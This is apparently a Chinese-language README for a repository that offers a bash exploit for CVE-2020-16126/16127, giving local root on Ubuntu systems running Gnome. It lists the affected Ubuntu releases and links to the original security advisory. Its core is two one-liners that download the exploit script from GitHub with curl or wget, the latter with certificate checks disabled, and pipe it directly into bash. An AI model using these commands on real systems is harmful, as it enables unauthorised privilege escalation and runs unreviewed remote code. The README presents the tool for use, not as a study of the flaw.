一个针对[CVE-2020-16126/CVE-2020-16127]的bash脚本利用,以实现权限提升。
一个可以方便实现Ubuntu本地提权的bash脚本(利用CVE-2020-16126/CVE-2020-16127漏洞),要求处于Gnome环境。
Ubuntu 20.04.1\20.10\18.04\16.04 LTS 等
curl https://raw.githubusercontent.com/zev3n/Ubuntu-Gnome-privilege-escalation/main/CVE-2020-1612%5B6_7%5D_exploit.sh | bash
或者(如果没有安装'curl'的权限,可以尝试……)
wget -q -O - --no-check-certificate https://raw.githubusercontent.com/zev3n/Ubuntu-Gnome-privilege-escalation/main/CVE-2020-1612%5B6_7%5D_exploit.sh | bash
待补充
https://securitylab.github.com/advisories/GHSL-2020-187-accountsservice-drop-privs-DOS